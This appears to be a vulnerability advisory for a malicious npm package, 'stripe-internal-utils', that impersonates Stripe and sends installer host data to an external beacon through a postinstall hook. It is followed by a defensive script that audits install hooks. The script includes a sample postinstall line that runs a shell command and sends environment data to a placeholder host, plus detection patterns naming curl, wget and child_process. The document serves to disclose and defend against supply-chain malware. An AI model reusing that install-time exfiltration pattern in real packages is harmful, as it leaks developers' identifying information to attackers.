npm

stripe-internal-utils @8.2.0

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-4184

Ecosystem

npm

Summary

package.json declares a postinstall hook that fires automatically on npm install and performs reconnaissance and exfiltration against the installer. The inline node -e payload fetches the installer's public IP from api.ipify.org, executes id || ver && whoami && hostname via child_process.exec, and POSTs a JSON body over HTTP to a hardcoded interactsh beacon at lszakfghwnvxspyfcmaabd1css99rnq3w.oast.fun. The body contains the timestamp, the USERDOMAIN, USERDNSDOMAIN and COMPANY environment variables, the public IP, the hostname, the current working directory, and the shell command output. The package's own description self-identifies as 'Full RCE PoC -osama', and the package name impersonates the Stripe brand so that installers see a name they would plausibly trust. Any developer or build system running npm install stripe-internal-utils leaks identifying host and user information to the attacker.

Source: amazon-inspector (b6add7fd3034c5b0d00e39e2cbfeb7c664085ef412612b53ebe9fd81767449be)
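A pre-install check for the pattern described in the summary, as an added example that is not part of the OSV record or of any scanner's own code: it inspects a parsed package.json for install-time hooks and flags inline evaluation, shell execution, environment reads and network destinations. The function name, indicator list and both sample manifests (including the placeholder host) are constructed for illustration.

```javascript
// Hooks npm runs automatically when a package is installed as a dependency.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic indicators (assumed for this example) based on the summary above.
const INDICATORS = [
  { id: "inline-eval", re: /\bnode\s+(?:-e|--eval|-p|--print)\b/ },
  { id: "shell-exec", re: /child_process|\bexecSync\b|\bspawn\b/ },
  { id: "env-read", re: /process\.env|%[A-Z_]+%|\$\{?[A-Z_]{3,}\}?/ },
  { id: "network", re: /https?:\/\/|\b(?:curl|wget)\b|require\(\s*['"]https?['"]\s*\)/ },
];
const HOST_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Returns one finding per install-time hook present in the manifest.
function auditLifecycleScripts(pkg) {
  const scripts = pkg && pkg.scripts && typeof pkg.scripts === "object" ? pkg.scripts : {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const indicators = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.id);
    const hosts = [...new Set([...cmd.matchAll(HOST_RE)].map((m) => m[1].toLowerCase()))];
    // review=false only means the inline command is clean; a hook that runs
    // a file (e.g. "node scripts/build.js") still needs that file inspected.
    findings.push({ hook, indicators, hosts, review: indicators.length > 0 });
  }
  return findings;
}

// Constructed samples, never executed; the host is a placeholder.
const SUSPICIOUS = {
  name: "example-internal-utils",
  scripts: {
    postinstall:
      "node -e \"require('child_process').exec('hostname');" +
      " require('http').get('http://collector.example.invalid/?d=' + process.env.USERDOMAIN)\"",
  },
};
const BENIGN = { name: "example-lib", scripts: { test: "node test.js", postinstall: "node scripts/build.js" } };

for (const pkg of [SUSPICIOUS, BENIGN]) {
  console.log(pkg.name, JSON.stringify(auditLifecycleScripts(pkg)));
}
```

Run it against a manifest taken from the registry tarball before installing, not from node_modules after the hook has already fired. Installing with npm install --ignore-scripts prevents lifecycle hooks from running at all.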
